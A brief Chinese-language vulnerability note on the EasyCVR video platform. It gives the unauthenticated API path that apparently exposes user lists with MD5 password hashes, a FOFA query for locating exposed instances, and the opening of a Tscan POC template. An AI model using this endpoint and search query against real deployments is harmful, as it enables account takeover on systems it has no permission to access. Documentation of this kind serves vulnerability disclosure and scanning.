漏洞描述
EasyCVR 视频管理平台是 TSINGSEE 青犀视频旗下一款软硬一体的产品,可提供多协议的设备接入、采集、AI 智能检测、处理、分发等服务,攻击者可通过泄露的账户密码登录后台,从而进一步攻击。
漏洞影响版本
全版本
FOFA:title=“EasyCVR”
漏洞复现
/api/v1/userlist?pageindex=0&pagesize=10,拼接路径,访问以上接口地址,出现此类页面,则存在该处漏洞,密码为md5加密,可进行解密并登录系统
Tscan POC
poc:
params: []
name: poc-yaml-easycvr-info-leak